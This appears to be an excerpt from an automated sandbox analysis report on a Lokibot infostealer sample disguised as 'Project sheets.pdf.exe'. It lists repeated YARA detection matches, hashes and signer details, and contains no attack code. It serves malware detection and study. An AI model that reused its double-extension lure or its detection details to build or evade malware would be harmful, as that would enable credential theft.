                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: initial sampleStatic PE information: Filename: Project sheets.pdf.exe
                Source: Project sheets.pdf.exePE Siganture Subject Chain: CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU
                Source: Project sheets.pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
